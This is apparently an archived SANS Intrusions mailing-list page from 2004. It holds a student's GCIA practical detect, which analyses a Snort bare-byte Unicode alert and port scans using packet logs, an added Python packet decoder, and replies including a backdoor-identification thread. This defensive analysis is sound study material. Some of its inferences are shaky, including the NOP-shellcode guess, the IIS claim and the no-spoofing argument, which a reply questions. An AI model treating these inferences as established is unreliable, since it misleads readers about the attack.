10.10.10.165:1703 -> > 192.168.17.68:1080 > TCP TTL:128 TOS:0x0 ID:42605 IpLen:20 DgmLen:48 DF > ******S* Seq: 
0x296B9F43 Ack: 0x0 Win: 0x4000 > TcpLen: 28 > TCP Options (4) => MSS: 1460 NOP NOP SackOK > =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ > > 11/19-02:08:09.095015 10.10.10.165:1711 -> > 192.168.17.68:1080 > TCP TTL:128 TOS:0x0 ID:42615 IpLen:20 DgmLen:48 DF > ******S* Seq: 0x2999ACB6 Ack: 0x0 Win: 0x4000 > TcpLen: 28 > TCP Options (4) => MSS: 1460 NOP NOP SackOK > =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ > > 11/19-02:08:12.089067 10.10.10.165:1711 -> > 192.168.17.68:1080 > TCP TTL:128 TOS:0x0 ID:42647 IpLen:20 DgmLen:48 DF > ******S* Seq: 0x2999ACB6 Ack: 0x0 Win: 0x4000 > TcpLen: 28 > TCP Options (4) => MSS: 1460 NOP NOP SackOK > =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ > > Run time for packet processing was 0.750000 seconds > > The above information still not enough to analyse the > intruder?s attempt so I have merged all log files into > one with the following command. > > C:> mergecap -w merge 2003.12.15.1 2003.12.15.2 > 2003.12.15.3 2003.12.15.4 2003.12.15.5 2003.12.15.6 > 2003.12.15.7 2003.12.15.8 2003.12.15.9 2003.12.15.10 > 2003.12.15.11 2003.12.15.12 2003.12.15.13 > 2003.12.15.14 > > Then I ran snort again with the same set of rules. 
> Some of the results that I got were shown below: > > =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ > > 11/19-02:05:05.114599 10.10.10.165:2695 -> > 192.168.17.68:1 > TCP TTL:128 TOS:0x0 ID:21572 IpLen:20 DgmLen:48 DF > ******S* Seq: 0x8158842 Ack: 0x0 Win: 0x4000 > TcpLen: 28 > TCP Options (4) => MSS: 1460 NOP NOP SackOK > =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ > > 11/19-02:05:05.115021 10.10.10.165:2696 -> > 192.168.17.68:2 > TCP TTL:128 TOS:0x0 ID:21573 IpLen:20 DgmLen:48 DF > ******S* Seq: 0x816111F Ack: 0x0 Win: 0x4000 > TcpLen: 28 > TCP Options (4) => MSS: 1460 NOP NOP SackOK > =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ > > 11/19-02:05:05.116627 10.10.10.165:2697 -> > 192.168.17.68:3 > TCP TTL:128 TOS:0x0 ID:21574 IpLen:20 DgmLen:48 DF > ******S* Seq: 0x816B61C Ack: 0x0 Win: 0x4000 > TcpLen: 28 > TCP Options (4) => MSS: 1460 NOP NOP SackOK > =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ > > 11/19-02:05:05.117195 10.10.10.165:2698 -> > 192.168.17.68:4 > TCP TTL:128 TOS:0x0 ID:21575 IpLen:20 DgmLen:48 DF > ******S* Seq: 0x817B1FC Ack: 0x0 Win: 0x4000 > TcpLen: 28 > TCP Options (4) => MSS: 1460 NOP NOP SackOK > =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ > > 11/19-02:05:05.117646 10.10.10.165:2699 -> > 192.168.17.68:5 > TCP TTL:128 TOS:0x0 ID:21576 IpLen:20 DgmLen:48 DF > ******S* Seq: 0x81865D4 Ack: 0x0 Win: 0x4000 > TcpLen: 28 > TCP Options (4) => MSS: 1460 NOP NOP SackOK > =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ > > The above are just sample packets. We can tell from > the generated packets that the attacker did TCP port > scan and UDP port scan to identified the open ports of > host 192.168.17.68. Once port 80 is found running, the > attack knew that this is a web server. So the attacker > was trying to scan the server with, probably, web > server scanning tools. 
> > 3. Probability the source address was spoofed > HTTP session requires a complete 3-way handshake. > This packet, however, did not complete the handshake > so it is unlikely that the source ip would be spoofed. > > 4. Description of attack > [1] Bare byte encoding is an IIS trick that uses > non-ASCII chars as valid values in decoding UTF-8 > values. This is NOT in the HTTP standard, as all > non-ASCII values have to be encoded with a %. Bare > byte encoding allows the user to emulate an IIS server > and interpret non-standard encodings correctly. > There are no legitimate clients that encoded UTF-8 > this way, since it is non-standard. > > For more descriptions on the terms being used, > > Unicode is a single unified character set. Unicode > provides a unique number for every character, no > matter what the platform, no matter what the program, > no matter what the language. [5] > UTF-8 is a method to encode character to Unicode. (one > of the three common encoding method) UTF-8 encodes > each Unicode character as a variable number of 1 to 4 > octets. Using Unicode/UTF-8, you can write in emails > and source code things such as Mathematics and > Sciences or different languages. > ASCII - ASCII code is the numerical representation of > a character. Because computer can only understand > numbers. All non-ASCII characters usually screwed up > when output it to the browser, such as some special > character or language. UTF-8 supports ASCII characters > but not very good in non-ASCII character. > > A http connection to the web server will usually start > with a request method such as GET or POST. All packets > (except for the highlighted one) has started a 3 way > handshake by initiating SYN to the web server. Somehow > the highlighted packet sent the packet with ACK flag > set to the web server without the request method. This > does not follow the RFC2616 and trigger snort rule to > alert. The result from Ethereal actually display this > packet at ?Continuation? 
which means there is no > request in the packet. > > 5. Attack mechanism > As I analyzed the combined log, I found that host > 10.10.10.165 tried various attacks against host > 192.168.17.68 including TCP scan, UDP scan, socks scan > and probably Unicode attack. Usually I would try to > obtain the correlation evidence from the secondary > resource such as web server to confirm the attack. > However, the secondary resource is not available in > this case and we only have the snort log up to less > than 2 hours. With such limitation I would assume that > the attack using Unicode, somehow, was used as part of > the scanning process and one of the scanning policy > happen to use the non-ASCII character that trigger the > snort rule to alert. > > To confirm my understanding, I set up a web server at > home and wrote some e-commerce pages. Then I ran snort > with the same rule set and used N-Stealth, a HTTP > Security Scanner, to scan the e-commerce application > that I created. N-Stealth used various combinations of > possible web application attack and generated a lot of > alerts including bare byte Unicode encoding? alerts. > > 6. Correlations > Bare byte Unicode encoding is considered under the > Unicode attack category. The Unicode attack was > previously raised by Bruce Schneier at > http://www.schneier.com/crypto-gram-0007.html > > 7. Evidence of active targeting > The attacker was trying to scan for vulnerable host. > Host 192.168.17.68 is not the key target at first. > > 8. Severity > Severity = (criticality + lethality) (system > countermeasures + network countermeasures) > > Criticality 4: This attack targets the IIS > Server which is a widely used web server worldwide. > > Lethality 2: This attack could be part of the > scanning and DoS. If successful, it could bring down > the server. For this case, this server is not the > target at first. The attacker performed host scanning > to look for vulnerable host. 
The attacker may have > succeeded compromise the server. From the log, there?s > no sign of system down. > > System countermeasures 2: The problem of IIS way of > encoding the non-ASCII character cannot be resolved > solely by patching. So I give 2. > > Network countermeasures 2: Firewalls and routers > cannot prevent the Unicode attack that well. So I give > 2 for this as well. Unless a specific web application > firewall is being used, then I will give a higher > rating. > > Severity = (4 + 2) - (2 + 2) = 2 > > 9. Defensive recommendation > -Apply necessary patches to prevent known > vulnerabilities at the web server or operating system. > -Apply a secure programming concept when developing > the web application. Necessary input validation must > be in place to filter out characters that will not be > needed. For most of the case, non-ASCII character > won?t be needed for any field. > -Have network measures in place such as properly > configured router, firewalls and IDS. > > 10. Multiple choice questions > Which web server could be vulnerable to ?bare byte > Unicode encoding? attack? > A. IIS > B. Netscape > C. Apache > D. Any web server > > Answer: A > > > > > __________________________________ > Do you Yahoo!? > New and Improved Yahoo! Mail - Send 10MB messages! > http://promotions.yahoo.com/new_mail > _______________________________________________ > Intrusions mailing list > Intrusions at lists.sans.org > http://www.dshield.org/mailman/listinfo/intrusions -- Dana Webber dana at dunrobin.dyn.dhs.org http://dunrobin.dyn.dhs.org Getting a computer system to work is like banging your head against a brick wall until the wall falls down. 
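The windump hex dump in Vilaiporn Taweelappontong's detect (the post quoted in the reply above and forwarded in full in Stephen Breault's reply below) can be decoded by hand to check what the analyst read from it. The following Python is an added example written for this page; it is not code from any message in the thread. The hex is copied from the windump output in the detect. The rest is assumed by this example rather than stated in the thread: that windump -x printed the frame from the IP header onward (it omits the link-layer header), so the bytes beyond the IP total length are Ethernet frame padding rather than TCP data, and that a byte of 0x80 or above sent raw in an HTTP request is the condition behind http_inspect's 'Bare Byte' alert. It verifies both the IP and TCP checksums the way tcpdump's "[tcp sum ok]" does, which is the check behind the post's remark that the checksums are intact.

```python
"""Decode the windump hex dump from the detect and check what http_inspect saw.

Added example for this page, not code from any message in the thread.
"""
import ipaddress
import struct

# Copied from the windump -x output in the detect: 23 words, 46 bytes, starting
# at the IP header (windump -x omits the link-layer header).
WINDUMP_HEX = """
4500 0029 a660 4000 8006 6dd3 0a0a 0aa5
c0a8 1144 043d 0050 e4f1 8713 16a6 b6db
5010 4470 b6b3 0000 9000 0000 0000
"""

# TCP flag bits, low to high, as laid out in the 16-bit offset/flags field.
TCP_FLAG_NAMES = ("FIN", "SYN", "RST", "PSH", "ACK", "URG", "ECE", "CWR")


def hexdump_to_bytes(dump: str) -> bytes:
    """Turn windump's '4500 0029 ...' text into raw bytes."""
    return bytes.fromhex("".join(dump.split()))


def ones_complement_sum(data: bytes) -> int:
    """RFC 1071 checksum: 16-bit one's-complement sum, folded, then inverted.
    Over a header that still contains its checksum field this returns 0."""
    if len(data) % 2:
        data += b"\x00"  # an odd trailing byte is summed as if padded with zero
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def decode_packet(raw: bytes) -> dict:
    """Parse the IPv4 and TCP headers, verify both checksums and separate the
    TCP payload from link-layer padding."""
    ihl = (raw[0] & 0x0F) * 4
    total_len = struct.unpack("!H", raw[2:4])[0]
    ip_hdr = raw[:ihl]
    # Assumption of this example: anything past the IP total length is Ethernet
    # frame padding (short frames are padded to 60 bytes), not TCP data.
    ip_pkt, padding = raw[:total_len], raw[total_len:]
    proto = ip_hdr[9]
    ip_csum_ok = ones_complement_sum(ip_hdr) == 0

    tcp = ip_pkt[ihl:]
    sport, dport, seq, ack, off_flags, win, _csum = struct.unpack("!HHIIHHH", tcp[:18])
    data_off = (off_flags >> 12) * 4
    flags = [name for bit, name in enumerate(TCP_FLAG_NAMES) if off_flags & (1 << bit)]
    # The TCP checksum also covers a pseudo-header: src, dst, zero, proto, TCP length.
    pseudo = ip_hdr[12:20] + struct.pack("!BBH", 0, proto, len(tcp))
    tcp_csum_ok = ones_complement_sum(pseudo + tcp) == 0

    return {
        "src": str(ipaddress.IPv4Address(ip_hdr[12:16])), "sport": sport,
        "dst": str(ipaddress.IPv4Address(ip_hdr[16:20])), "dport": dport,
        "ip_id": struct.unpack("!H", raw[4:6])[0], "ip_total_len": total_len,
        "ip_checksum_ok": ip_csum_ok, "tcp_checksum_ok": tcp_csum_ok,
        "flags": flags, "seq": seq, "ack": ack, "window": win,
        "payload": tcp[data_off:], "frame_padding": padding,
    }


def bare_bytes(payload: bytes) -> list:
    """Offsets of bytes >= 0x80 sent raw instead of %XX-encoded. Assumption of
    this example: this is the condition behind http_inspect's 'Bare Byte' alert."""
    return [i for i, b in enumerate(payload) if b >= 0x80]


if __name__ == "__main__":
    pkt = decode_packet(hexdump_to_bytes(WINDUMP_HEX))
    print(f"{pkt['src']}:{pkt['sport']} -> {pkt['dst']}:{pkt['dport']} "
          f"flags={pkt['flags']} ip_csum_ok={pkt['ip_checksum_ok']} "
          f"tcp_csum_ok={pkt['tcp_checksum_ok']}")
    print(f"payload={pkt['payload']!r} ({len(pkt['payload'])} byte(s)), "
          f"frame padding={len(pkt['frame_padding'])} byte(s), "
          f"bare byte offsets={bare_bytes(pkt['payload'])}")
```

Run as-is, it reports 10.10.10.165:1085 -> 192.168.17.68:80 with only ACK set, both checksums intact, a single data byte 0x90 at offset 0 and five bytes of zero padding. The one-byte payload matches the "(1)" in windump's own summary line, and the five trailing zero words in the dump are frame padding, not data, which is why the IP total length rather than the dump length has to bound the payload.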
From dana at dunrobin.dyn.dhs.org Sun Jul 11 21:53:54 2004
From: dana at dunrobin.dyn.dhs.org (Dana Webber)
Date: Sun, 11 Jul 2004 17:53:54 -0400
Subject: [Intrusions] Need help to identify a trojan
In-Reply-To: <40F05E75.E6B648BD@epost.de>
References: <020e01c465b9$8268d500$a900a8c0@cybergeneration.com> <40F05E75.E6B648BD@epost.de>
Message-ID: <200407111753.54342.dana@dunrobin.dyn.dhs.org>

Have you tried Ad-Aware from www.lavasoftusa.com? It's free.

On Saturday 10 July 2004 17:24, Axel Pettinger wrote:
> Maxime Ducharme wrote:
> > Hi to the list,
> > one of our customer's servers has been compromised and I'd
> > need help to identify the trojan used.
> > [snip]
> >
> > This file is bound to TCP port 753, and a connection on this
> > port outputs this:
> > 220 jsdaus Microsoft FTP Service (Version 5.0)
> > [snip]
> >
> > Norton says this file is not infected,
>
> That's correct as - strictly speaking - it isn't "infected" ... ;-)
>
> > but it looks really suspicious,
>
> Unpack the file using UPX and then have a look at it with something
> like Notepad.
>
> > we already shut down the server for analysis. It has been used for
> > scanning.
> >
> > Other hack tools have been found under C:\RECYCLER\speedy.
> >
> > I'd like to know which kind of trojan it is, and if it has
> > self-propagating behavior like some Ago-Gaobot.
>
> I don't know that for sure but I really doubt it.
>
> McAfee identifies the file (MD5: ffdbe99a3e614650d93b310a34273d4e) as
> "application SimpelFTP" - note that it doesn't report it as a trojan,
> only as a "potentially unwanted application". This certainly sounds a
> little bit strange because other AV scanners identify it as a backdoor
> trojan variant named "Delf" and the file itself contains the string
> "Simpel IRC BOT".
>
> There seem to be several variants of that "Simpel" program, because the
> one mentioned in the VGrep virus data base obviously cannot be the one
> you found:
> http://www.virusbtn.com/resources/vgrep/vgrep.cgi?terms=SimpelFTP&product=8
>
> Regards,
> Axel Pettinger
> _______________________________________________
> Intrusions mailing list
> Intrusions at lists.sans.org
> http://www.dshield.org/mailman/listinfo/intrusions

-- 
Dana Webber dana at dunrobin.dyn.dhs.org http://dunrobin.dyn.dhs.org
Getting a computer system to work is like banging your head against a brick wall until the wall falls down.

From Breault.SM at forces.gc.ca Sun Jul 11 22:24:12 2004
From: Breault.SM at forces.gc.ca (Breault.SM at forces.gc.ca)
Date: Sun, 11 Jul 2004 18:24:12 -0400
Subject: [Intrusions] LOGS: GIAC GCIA Version 3.4 Practical Detect VilaipornTaweelappontong
Message-ID: <20040711222043.10F5182585@mx01.forces.gc.ca>

Hi, hope this helps.

>cut from your detect
3. Probability the source address was spoofed
HTTP session requires a complete 3-way handshake. This packet, however, did not complete the handshake so it is unlikely that the source ip would be spoofed.

Does this mean that an IP that does not complete the handshake is therefore not spoofed????

Stephen Breault
Master Seaman
Shift 4 Supervisor
DND Computer Incident Response Team (DND CIRT)
Canadian Forces Network Operations Centre
Téléphone / Phone: (613) 945-7746 CSN: 849-7746
Télécopieur / Fax: (613) 945-6407
Courrier électronique / E-Mail:
DWAN:
Building/Edifice: CFS Leitrim
DIN:
***** Computer security incident? Call 613-945-7777 or toll free 1-877-DND-CIRT ******
***** Incidents informatiques?
Appelez 613-945-7777 ou sans frais 1-877-DND-CIRT ******

-----Original Message-----
From: Vilaiporn Taweelappontong [mailto:vilaiporn_taweelappontong at yahoo.com]
Sent: Sunday, July 11, 2004 2:31 AM
To: intrusions at lists.sans.org
Subject: [Intrusions] LOGS: GIAC GCIA Version 3.4 Practical Detect VilaipornTaweelappontong

Dear all,

This is a second attempt to post the assignment. I would really appreciate it if someone could give me comments on my analysis.

Thank you very much in advance and regards,
Vilaiporn

1. Source of trace

The source of the trace was file 2003.12.15.6, downloaded from www.incidents.org/log.

-Statistics (from Ethereal)
File length: 3000044
Format: libpcap
Start time: 2:07:16.936242
End time: 2:08:17.518422
Elapsed time between first and last packet: 60.582 seconds
Packet count: 36672
Snapshot length: 96

I used the Statistics function of Ethereal to summarize a list of IP addresses and MAC addresses in the file, and I looked up the vendor of each Ethernet MAC address at the web site http://www.coffer.com/mac_find/. Below is the architecture based on my understanding:

10.10.10.165 (00:03:47:8c:89:c2 Intel machine) ---> 3COM (00:01:02:79:91:ed) ---> Sniffer ----> Firewall ---> 192.168.17.68 (00:50:56:40:00:6D VMWARE)

Observation: the file date and the packet timestamps differ. The file name indicates that the data should be from 2003/12/15, but the date in all packets actually indicates that they were generated on 2003/11/19. I understand that some technique was used to obfuscate the information, such as modifying IP addresses, as the checksums of all packets are correct. Or no obfuscation has been done.

2. Detect was generated by

The file is stored in tcpdump binary format. The detect presented in this assignment was generated by Snort version 2.1.1, which I ran on my Windows 2000 Server machine. I ran Snort in NIDS mode with the standard Snort ruleset downloaded on 2 May 2004. All rules files were enabled.
Command that was used:

C:\snort\bin\snort -r 2003.12.15.6 -c c:\snort\etc\snort.conf -l ex1 -X -d -A full

-r 2003.12.15.6             read source file 2003.12.15.6
-c c:\snort\etc\snort.conf  run against the configuration file snort.conf
-l ex1                      log the output (alert file and log file) to the ex1 folder
-X                          dump the raw packet data starting at the link layer (in this case, the Ethernet header)
-d                          dump the application layer (the packet payloads along with the packet headers)
-A full                     display text alerts with full packet headers

The selected alert result is as follows:

[**] (http_inspect) BARE BYTE UNICODE ENCODING [**]
11/19-02:08:04.823979 10.10.10.165:1085 -> 192.168.17.68:80
TCP TTL:128 TOS:0x0 ID:42592 IpLen:20 DgmLen:41 DF
***A**** Seq: 0xE4F18713 Ack: 0x16A6B6DB Win: 0x4470 TcpLen: 20

The Snort rule that triggered the 'Bare Byte Unicode Encoding' alert was the http_inspect preprocessor configuration. [1] Preprocessors take the decoded packets from the Snort packet decoder and can examine or manipulate them before they are handed to the detection engine.

preprocessor stream4_reassemble

preprocessor http_inspect: global \
    iis_unicode_map unicode.map 1252

preprocessor http_inspect_server: server default \
    profile all ports { 80 8080 8180 } \
    oversize_dir_length 500

Note that 'profile all' includes 'bare byte decoding' enabled. The following configuration was displayed when running Snort (without the quiet option enabled). You can see that the bare byte option was set to YES.
HttpInspect Config:
  GLOBAL CONFIG
    Max Pipeline Requests:    0
    Inspection Type:          STATELESS
    Detect Proxy Usage:       NO
    IIS Unicode Map Filename: c:\snort\etc\unicode.map
    IIS Unicode Map Codepage: 1252
  DEFAULT SERVER CONFIG:
    Ports: 80 8080 8180
    Flow Depth: 300
    Max Chunk Length: 500000
    Inspect Pipeline Requests: YES
    URI Discovery Strict Mode: NO
    Allow Proxy Usage: NO
    Disable Alerting: YES
    Oversize Dir Length: 500
    Only inspect URI: NO
    Ascii: YES alert: NO
    Double Decoding: YES alert: YES
    %U Encoding: YES alert: YES
    Bare Byte: YES alert: YES
    Base36: OFF
    UTF 8: OFF
    IIS Unicode: YES alert: YES
    Multiple Slash: YES alert: NO
    IIS Backslash: YES alert: NO
    Directory: YES alert: NO
    Apache WhiteSpace: YES alert: YES
    IIS Delimiter: YES alert: YES
    IIS Unicode Map: GLOBAL IIS UNICODE MAP CONFIG
    Non-RFC Compliant Characters: NONE

To look into the packet in detail, I used windump to print the packet in hex format:

C:\windump>windump -r 2003.12.15.6 -x -vv -n "dst host 192.168.17.68 and port 80"

02:08:04.823979 IP (tos 0x0, ttl 128, id 42592, len 41) 10.10.10.165.1085 > 192.168.17.68.80: . [tcp sum ok] 3841034003:3841034004(1) ack 380024539 win 17520 (DF)
    4500 0029 a660 4000 8006 6dd3 0a0a 0aa5
    c0a8 1144 043d 0050 e4f1 8713 16a6 b6db
    5010 4470 b6b3 0000 9000 0000 0000

It's obvious that host 192.168.17.68 is a web server and that it's IIS. The data field displayed in hex above is '90' (a NOP byte, usually used by shellcode), which looks like someone trying a buffer overflow on the web server.

Let's also look at other packets associated with host 192.168.17.68 for a better analysis.
C:\Snort\log\old>snort -r 2003.12.15.6 -v -q "host 192.168.17.68"

11/19-02:07:48.841453 10.10.10.165:1691 -> 192.168.17.68:1080
TCP TTL:128 TOS:0x0 ID:41554 IpLen:20 DgmLen:48 DF
******S* Seq: 0x293AB444 Ack: 0x0 Win: 0x4000 TcpLen: 28
TCP Options (4) => MSS: 1460 NOP NOP SackOK
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

11/19-02:07:51.828714 10.10.10.165:1691 -> 192.168.17.68:1080
TCP TTL:128 TOS:0x0 ID:41720 IpLen:20 DgmLen:48 DF
******S* Seq: 0x293AB444 Ack: 0x0 Win: 0x4000 TcpLen: 28
TCP Options (4) => MSS: 1460 NOP NOP SackOK
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

11/19-02:07:57.968183 10.10.10.165:1691 -> 192.168.17.68:1080
TCP TTL:128 TOS:0x0 ID:42089 IpLen:20 DgmLen:48 DF
******S* Seq: 0x293AB444 Ack: 0x0 Win: 0x4000 TcpLen: 28
TCP Options (4) => MSS: 1460 NOP NOP SackOK
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

11/19-02:07:59.094302 10.10.10.165:1703 -> 192.168.17.68:1080
TCP TTL:128 TOS:0x0 ID:42248 IpLen:20 DgmLen:48 DF
******S* Seq: 0x296B9F43 Ack: 0x0 Win: 0x4000 TcpLen: 28
TCP Options (4) => MSS: 1460 NOP NOP SackOK
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

11/19-02:08:02.163499 10.10.10.165:1703 -> 192.168.17.68:1080
TCP TTL:128 TOS:0x0 ID:42416 IpLen:20 DgmLen:48 DF
******S* Seq: 0x296B9F43 Ack: 0x0 Win: 0x4000 TcpLen: 28
TCP Options (4) => MSS: 1460 NOP NOP SackOK
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

11/19-02:08:04.823979 10.10.10.165:1085 -> 192.168.17.68:80
TCP TTL:128 TOS:0x0 ID:42592 IpLen:20 DgmLen:41 DF
***A**** Seq: 0xE4F18713 Ack: 0x16A6B6DB Win: 0x4470 TcpLen: 20
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

11/19-02:08:08.302980 10.10.10.165:1703 -> 192.168.17.68:1080
TCP TTL:128 TOS:0x0 ID:42605 IpLen:20 DgmLen:48 DF
******S* Seq: 0x296B9F43 Ack: 0x0 Win: 0x4000 TcpLen: 28
TCP Options (4) => MSS: 1460 NOP NOP SackOK
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

11/19-02:08:09.095015 10.10.10.165:1711 -> 192.168.17.68:1080
TCP TTL:128 TOS:0x0 ID:42615 IpLen:20 DgmLen:48 DF
******S* Seq: 0x2999ACB6 Ack: 0x0 Win: 0x4000 TcpLen: 28
TCP Options (4) => MSS: 1460 NOP NOP SackOK
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

11/19-02:08:12.089067 10.10.10.165:1711 -> 192.168.17.68:1080
TCP TTL:128 TOS:0x0 ID:42647 IpLen:20 DgmLen:48 DF
******S* Seq: 0x2999ACB6 Ack: 0x0 Win: 0x4000 TcpLen: 28
TCP Options (4) => MSS: 1460 NOP NOP SackOK
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

Run time for packet processing was 0.750000 seconds

The above information was still not enough to analyse the intruder's attempt, so I merged all the log files into one with the following command:

C:> mergecap -w merge 2003.12.15.1 2003.12.15.2 2003.12.15.3 2003.12.15.4 2003.12.15.5 2003.12.15.6 2003.12.15.7 2003.12.15.8 2003.12.15.9 2003.12.15.10 2003.12.15.11 2003.12.15.12 2003.12.15.13 2003.12.15.14

Then I ran Snort again with the same set of rules.
Some of the results that I got are shown below:

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

11/19-02:05:05.114599 10.10.10.165:2695 -> 192.168.17.68:1
TCP TTL:128 TOS:0x0 ID:21572 IpLen:20 DgmLen:48 DF
******S* Seq: 0x8158842 Ack: 0x0 Win: 0x4000 TcpLen: 28
TCP Options (4) => MSS: 1460 NOP NOP SackOK
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

11/19-02:05:05.115021 10.10.10.165:2696 -> 192.168.17.68:2
TCP TTL:128 TOS:0x0 ID:21573 IpLen:20 DgmLen:48 DF
******S* Seq: 0x816111F Ack: 0x0 Win: 0x4000 TcpLen: 28
TCP Options (4) => MSS: 1460 NOP NOP SackOK
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

11/19-02:05:05.116627 10.10.10.165:2697 -> 192.168.17.68:3
TCP TTL:128 TOS:0x0 ID:21574 IpLen:20 DgmLen:48 DF
******S* Seq: 0x816B61C Ack: 0x0 Win: 0x4000 TcpLen: 28
TCP Options (4) => MSS: 1460 NOP NOP SackOK
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

11/19-02:05:05.117195 10.10.10.165:2698 -> 192.168.17.68:4
TCP TTL:128 TOS:0x0 ID:21575 IpLen:20 DgmLen:48 DF
******S* Seq: 0x817B1FC Ack: 0x0 Win: 0x4000 TcpLen: 28
TCP Options (4) => MSS: 1460 NOP NOP SackOK
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

11/19-02:05:05.117646 10.10.10.165:2699 -> 192.168.17.68:5
TCP TTL:128 TOS:0x0 ID:21576 IpLen:20 DgmLen:48 DF
******S* Seq: 0x81865D4 Ack: 0x0 Win: 0x4000 TcpLen: 28
TCP Options (4) => MSS: 1460 NOP NOP SackOK
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

The above are just sample packets. We can tell from the generated packets that the attacker did a TCP port scan and a UDP port scan to identify the open ports of host 192.168.17.68. Once port 80 was found open, the attacker knew that this is a web server. So the attacker was trying to scan the server with, probably, web server scanning tools.

3. Probability the source address was spoofed

An HTTP session requires a complete 3-way handshake. This packet, however, did not complete the handshake, so it is unlikely that the source IP would be spoofed.

4. Description of attack

[1] Bare byte encoding is an IIS trick that uses non-ASCII chars as valid values in decoding UTF-8 values. This is NOT in the HTTP standard, as all non-ASCII values have to be encoded with a %. Bare byte encoding allows the user to emulate an IIS server and interpret non-standard encodings correctly. There are no legitimate clients that encode UTF-8 this way, since it is non-standard.

For more descriptions of the terms being used:

Unicode is a single unified character set. Unicode provides a unique number for every character, no matter what the platform, no matter what the program, no matter what the language. [5]

UTF-8 is a method of encoding Unicode characters (one of the three common encoding methods). UTF-8 encodes each Unicode character as a variable number of 1 to 4 octets. Using Unicode/UTF-8, you can write in emails and source code things such as mathematics and sciences or different languages.

ASCII - ASCII code is the numerical representation of a character, because computers can only understand numbers. All non-ASCII characters usually get screwed up when output to the browser, such as some special characters or languages. UTF-8 supports ASCII characters but is not very good with non-ASCII characters.

An HTTP connection to the web server will usually start with a request method such as GET or POST. All packets (except for the highlighted one) started a 3-way handshake by sending a SYN to the web server. Somehow the highlighted packet was sent to the web server with the ACK flag set and without a request method. This does not follow RFC 2616 and triggered the Snort rule to alert. Ethereal actually displays this packet as 'Continuation', which means there is no request in the packet.

5. Attack mechanism

As I analyzed the combined log, I found that host 10.10.10.165 tried various attacks against host 192.168.17.68, including a TCP scan, a UDP scan, a SOCKS scan and probably a Unicode attack. Usually I would try to obtain correlating evidence from a secondary resource such as the web server to confirm the attack. However, the secondary resource is not available in this case, and we only have the Snort log for less than 2 hours. With such limitations, I would assume that the Unicode attack, somehow, was used as part of the scanning process and that one of the scanning policies happened to use the non-ASCII character that triggered the Snort rule to alert.

To confirm my understanding, I set up a web server at home and wrote some e-commerce pages. Then I ran Snort with the same rule set and used N-Stealth, an HTTP security scanner, to scan the e-commerce application that I created. N-Stealth used various combinations of possible web application attacks and generated a lot of alerts, including 'bare byte Unicode encoding' alerts.

6. Correlations

Bare byte Unicode encoding is considered to be in the Unicode attack category. The Unicode attack was previously raised by Bruce Schneier at http://www.schneier.com/crypto-gram-0007.html

7. Evidence of active targeting

The attacker was scanning for vulnerable hosts. Host 192.168.17.68 was not the key target at first.

8. Severity

Severity = (criticality + lethality) - (system countermeasures + network countermeasures)

Criticality 4: This attack targets the IIS server, which is a widely used web server worldwide.

Lethality 2: This attack could be part of scanning and DoS. If successful, it could bring down the server. In this case, this server was not the target at first. The attacker performed host scanning to look for vulnerable hosts. The attacker may have succeeded in compromising the server. From the log, there's no sign of the system going down.
